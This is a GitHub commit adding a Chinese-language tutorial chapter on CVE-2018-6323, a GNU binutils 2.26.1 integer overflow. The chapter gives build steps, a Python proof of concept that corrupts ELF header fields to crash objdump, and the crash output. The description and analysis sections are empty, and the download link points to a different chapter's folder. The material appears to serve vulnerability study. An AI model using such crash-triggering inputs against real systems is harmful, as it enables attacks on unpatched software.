-
Notifications
You must be signed in to change notification settings - Fork 702
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
6 changed files
with
140 additions
and
7 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,110 @@ | ||
# 7.1.7 [CVE-2018-6323] GNU binutils 2.26.1 Integer Overflow | ||
|
||
- [漏洞描述](#漏洞描述) | ||
- [漏洞复现](#漏洞复现) | ||
- [漏洞分析](#漏洞分析) | ||
- [参考资料](#参考资料) | ||
|
||
|
||
[下载文件](../src/exploit/7.1.6_dnstracer_2017-9430) | ||
|
||
## 漏洞描述 | ||
|
||
## 漏洞复现 | ||
| |推荐使用的环境 | 备注 | | ||
| --- | --- | --- | | ||
| 操作系统 | Ubuntu 16.04 | 体系结构:64 位 | | ||
| 调试器 | gdb-peda| 版本号:7.11.1 | | ||
| 漏洞软件 | binutils | 版本号:2.26.1 | | ||
|
||
编译安装 binutils: | ||
``` | ||
$ wget https://ftp.gnu.org/gnu/binutils/binutils-2.26.1.tar.gz | ||
$ tar zxvf binutils-2.26.1.tar.gz | ||
$ cd binutils-2.26.1/ | ||
$ ./configure --enable-64-bit-bfd | ||
$ make && sudo make install | ||
$ file /usr/local/bin/objdump | ||
/usr/local/bin/objdump: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=72a5ff5705687fd1aa6ee58aff08d57b87694cb4, not stripped | ||
``` | ||
|
||
使用 PoC 如下: | ||
```python | ||
import os | ||
|
||
hello = "#include<stdio.h>\nint main(){printf(\"HelloWorld!\\n\"); return 0;}" | ||
f = open("helloWorld.c", 'w') | ||
f.write(hello) | ||
f.close() | ||
|
||
os.system("gcc -c helloWorld.c -o test") | ||
|
||
f = open("test", 'rb+') | ||
f.read(0x2c) | ||
f.write("\xff\xff") # 65535 | ||
f.read(0x244-0x2c-2) | ||
f.write("\x00\x00\x00\x20") # 536870912 | ||
f.close() | ||
|
||
os.system("objdump -x test") | ||
``` | ||
``` | ||
$ python poc.py | ||
objdump: test: File truncated | ||
*** Error in `objdump': free(): invalid pointer: 0x09803aa8 *** | ||
======= Backtrace: ========= | ||
/lib/i386-linux-gnu/libc.so.6(+0x67377)[0xb75ef377] | ||
/lib/i386-linux-gnu/libc.so.6(+0x6d2f7)[0xb75f52f7] | ||
/lib/i386-linux-gnu/libc.so.6(+0x6dc31)[0xb75f5c31] | ||
objdump[0x81421cb] | ||
objdump[0x8091ab0] | ||
objdump[0x809349c] | ||
objdump[0x809400a] | ||
objdump[0x80522aa] | ||
objdump[0x804c17e] | ||
/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf7)[0xb75a0637] | ||
objdump[0x804c38a] | ||
======= Memory map: ======== | ||
08048000-0822c000 r-xp 00000000 08:01 270806 /usr/local/bin/objdump | ||
0822c000-0822d000 r--p 001e3000 08:01 270806 /usr/local/bin/objdump | ||
0822d000-08231000 rw-p 001e4000 08:01 270806 /usr/local/bin/objdump | ||
08231000-08237000 rw-p 00000000 00:00 0 | ||
09802000-09823000 rw-p 00000000 00:00 0 [heap] | ||
b7200000-b7221000 rw-p 00000000 00:00 0 | ||
b7221000-b7300000 ---p 00000000 00:00 0 | ||
b7353000-b736f000 r-xp 00000000 08:01 394789 /lib/i386-linux-gnu/libgcc_s.so.1 | ||
b736f000-b7370000 rw-p 0001b000 08:01 394789 /lib/i386-linux-gnu/libgcc_s.so.1 | ||
b7387000-b7587000 r--p 00000000 08:01 141924 /usr/lib/locale/locale-archive | ||
b7587000-b7588000 rw-p 00000000 00:00 0 | ||
b7588000-b7738000 r-xp 00000000 08:01 394751 /lib/i386-linux-gnu/libc-2.23.so | ||
b7738000-b773a000 r--p 001af000 08:01 394751 /lib/i386-linux-gnu/libc-2.23.so | ||
b773a000-b773b000 rw-p 001b1000 08:01 394751 /lib/i386-linux-gnu/libc-2.23.so | ||
b773b000-b773e000 rw-p 00000000 00:00 0 | ||
b773e000-b7741000 r-xp 00000000 08:01 394775 /lib/i386-linux-gnu/libdl-2.23.so | ||
b7741000-b7742000 r--p 00002000 08:01 394775 /lib/i386-linux-gnu/libdl-2.23.so | ||
b7742000-b7743000 rw-p 00003000 08:01 394775 /lib/i386-linux-gnu/libdl-2.23.so | ||
b7751000-b7752000 rw-p 00000000 00:00 0 | ||
b7752000-b7759000 r--s 00000000 08:01 139343 /usr/lib/i386-linux-gnu/gconv/gconv-modules.cache | ||
b7759000-b775a000 r--p 00741000 08:01 141924 /usr/lib/locale/locale-archive | ||
b775a000-b775c000 rw-p 00000000 00:00 0 | ||
b775c000-b775e000 r--p 00000000 00:00 0 [vvar] | ||
b775e000-b7760000 r-xp 00000000 00:00 0 [vdso] | ||
b7760000-b7782000 r-xp 00000000 08:01 394723 /lib/i386-linux-gnu/ld-2.23.so | ||
b7782000-b7783000 rw-p 00000000 00:00 0 | ||
b7783000-b7784000 r--p 00022000 08:01 394723 /lib/i386-linux-gnu/ld-2.23.so | ||
b7784000-b7785000 rw-p 00023000 08:01 394723 /lib/i386-linux-gnu/ld-2.23.so | ||
bf85b000-bf87c000 rw-p 00000000 00:00 0 [stack] | ||
Aborted (core dumped) | ||
``` | ||
|
||
需要注意的是如果在 configure 的时候没有使用参数 `--enable-64-bit-bfd`,将会出现下面的结果: | ||
``` | ||
$ python poc.py | ||
objdump: test: File format not recognized | ||
``` | ||
|
||
|
||
## 漏洞分析 | ||
|
||
## 参考资料 | ||
- [GNU binutils 2.26.1 - Integer Overflow (POC)](https://www.exploit-db.com/exploits/44035/) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,8 +1,9 @@ | ||
# 第七篇 实战篇 | ||
|
||
- [7.1.1 [CVE-2017-11543] tcpdump 4.9.0 Buffer Overflow](7.1.1_tcpdump_2017-11543.md) | ||
- [7.1.2 [CVE-2015-0235] glibc 2.17 Buffer Overflow](7.1.2_glibc_2015-0235.md) | ||
- [7.1.3 [CVE-2016-4971] wget 1.17.1 Arbitrary File Upload](7.1.3_wget_2016-4971.md) | ||
- [7.1.4 [CVE-2017-13089] wget 1.19.1 Buffer Overflow](7.1.4_wget_2017-13089.md) | ||
- [7.1.5 [CVE–2018-1000001] glibc Buffer Underflow](7.1.5_glibc_2018-1000001.md) | ||
- [7.1.6 [CVE-2017-9430] DNSTracer 1.9 Buffer Overflow](7.1.6_dnstracer_2017-9430.md) | ||
- [7.1.1 [CVE-2017-11543] tcpdump 4.9.0 Buffer Overflow](7.1.1_tcpdump_2017-11543.md) | ||
- [7.1.2 [CVE-2015-0235] glibc 2.17 Buffer Overflow](7.1.2_glibc_2015-0235.md) | ||
- [7.1.3 [CVE-2016-4971] wget 1.17.1 Arbitrary File Upload](7.1.3_wget_2016-4971.md) | ||
- [7.1.4 [CVE-2017-13089] wget 1.19.1 Buffer Overflow](7.1.4_wget_2017-13089.md) | ||
- [7.1.5 [CVE–2018-1000001] glibc Buffer Underflow](7.1.5_glibc_2018-1000001.md) | ||
- [7.1.6 [CVE-2017-9430] DNSTracer 1.9 Buffer Overflow](7.1.6_dnstracer_2017-9430.md) | ||
- [7.1.7 [CVE-2018-6323] GNU binutils 2.26.1 Integer Overflow](7.1.7_binutils_2018-6323.md) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,17 @@ | ||
import os | ||
|
||
hello = "#include<stdio.h>\nint main(){printf(\"HelloWorld!\\n\"); return 0;}" | ||
f = open("helloWorld.c", 'w') | ||
f.write(hello) | ||
f.close() | ||
|
||
os.system("gcc -c helloWorld.c -o test") | ||
|
||
f = open("test", 'rb+') | ||
f.read(0x2c) | ||
f.write("\xff\xff") # 65535 | ||
f.read(0x244-0x2c-2) | ||
f.write("\x00\x00\x00\x20") # 536870912 | ||
f.close() | ||
|
||
os.system("objdump -x test") |